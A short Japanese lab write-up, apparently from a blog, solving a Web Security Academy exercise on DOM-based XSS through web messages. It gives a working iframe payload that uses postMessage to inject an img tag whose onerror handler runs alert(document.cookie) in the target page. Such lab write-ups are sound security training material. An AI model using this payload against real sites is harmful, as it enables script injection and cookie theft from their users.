Hello there, ('ω')ノ
Webメッセージを使用するDOMXSSを。
WebメッセージをリッスンするaddEventListenerが確認できて。
「addEventListener()」は、JavaScriptからさまざまなイベント処理を実行できて。
まずは、下記にアクセスして。
https://aca01f2c1ee41512805864ec009e00a1.web-security-academy.net/
エクスプロイトサーバにページを読み込んで、エラーを発生させて。
スクリプトを実行するように仕掛けて。
<iframe src="https://aca01f2c1ee41512805864ec009e00a1.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(document.cookie)>','*')" width="1000px" height="800px">
クリアできた。
ちなみにView exploitをクリックしてみると。
初めのページからといったメッセージが。
Best regards, (^^ゞ